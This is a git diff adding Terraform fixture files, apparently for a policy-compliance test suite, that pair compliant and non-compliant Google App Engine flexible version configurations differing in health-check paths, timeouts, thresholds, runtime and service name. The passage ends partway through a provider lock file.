b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/c.tf new file mode 100644 index 000000000..ce0d8da46 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/c.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/nc.tf new file mode 100644 index 000000000..9f0a88039 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/nc.tf @@ -0,0 +1,30 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "unauthorized-service" + runtime = "python27" + + entrypoint { + shell = "python app.py" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + manual_scaling { + instances = 1 + } + + liveness_check { + path = "/unapproved-endpoint" + } + + readiness_check { + path = "/not-monitored" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/plan.json new file mode 100644 index 000000000..03f4a3ee4 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/c.tf new file mode 100644 index 000000000..af3c02445 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/c.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "4s" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/nc.tf new file mode 100644 index 000000000..f69c93790 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/nc.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "30s" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/plan.json new file mode 100644 index 000000000..b72078a3d Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/.terraform.lock.hcl new file mode 100644 index 000000000..316309c9a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.17.0" + hashes = [ + "h1:VPHRMsm3eQrxzk1b7eHuSG9sG7315ZaGPshFjqzZ5No=", + "zh:103778d776fb994a6b24d70fa095c23a1672361f2a05d882b227b02507b402fc", + "zh:34bcd6cce3081a21983ccfad5cbf2cbf69ff298c65c6570edb4ec7d38a8183f5", + "zh:5f8fd0e8e40068b597b28c0bc08372c9228aad77746068101c72acf4bb902937", + "zh:6b25cee7dec78470feb987438aedb1f4354c696f6548edee7775621e8df24fa9", + "zh:6b5bd97884b51b86fa6a9f1905c0ebf695539e905122052896e8b05122416ff4", + "zh:86e634c5825d8bd32592ae6b74f15e1db5d9b61c85d1a2e529d1696effb76d54", + "zh:c3190609f6f638f4efd7359a5638eeff81d41a38a00861f7df870b5c8f4c11cb", + "zh:d42d854642b4d3b010f232d848197945f90af60e7f9883ac96d7caae9c9d2474", + "zh:da9929be5d3873ad317e488e7ada08d5b95b5461b34d91cef76314317bdc0d49", + "zh:ed2763c21b2f3c1eb7b4b92f6502069a24078345e19c88f91d9e3a46a17147f8", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + "zh:fbca63b82bbdef6fd329d2c8356b3f39f8c785ad93fd0596cfff676dbaef23ac", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/c.tf new file mode 100644 index 000000000..805b750f7 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/c.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + failure_threshold = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/nc.tf new file mode 100644 index 000000000..e98547ba7 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/nc.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + failure_threshold = 0 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/plan.json new file mode 100644 index 000000000..f3ef2323c Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/c.tf new file mode 100644 index 000000000..ce0d8da46 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/c.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/nc.tf new file mode 100644 index 000000000..22b67cca0 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/nc.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/invalid-path" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/plan.json new file mode 100644 index 000000000..089f40024 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/c.tf new file mode 100644 index 000000000..07ed32a1a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/c.tf @@ -0,0 +1,34 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "4s" + } + + readiness_check { + path = "/" + timeout = "4s" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/nc.tf new file mode 100644 index 000000000..e328895ab --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/nc.tf @@ -0,0 +1,34 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1-bad" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "4s" + } + + readiness_check { + path = "/" + timeout = "30s" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/plan.json new file mode 100644 index 000000000..4e63b0847 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/timeout/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/c.tf new file mode 100644 index 000000000..3e0fdb9e3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/c.tf @@ -0,0 +1,15 @@ +resource "google_app_engine_flexible_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs" + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { path = "/" } + readiness_check { path = "/" } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/nc.tf new file mode 100644 index 000000000..6107c37ea --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/nc.tf @@ -0,0 +1,15 @@ +resource "google_app_engine_flexible_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "python27" + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { path = "/" } + readiness_check { path = "/" } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/plan.json new file mode 100644 index 000000000..1a9131dc2 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/runtime/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/c.tf new file mode 100644 index 000000000..ce0d8da46 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/c.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/nc.tf new file mode 100644 index 000000000..823de9b73 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/nc.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "unauthorized-app" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/service/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/plan.json new file mode 100644 index 000000000..19b473609 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + 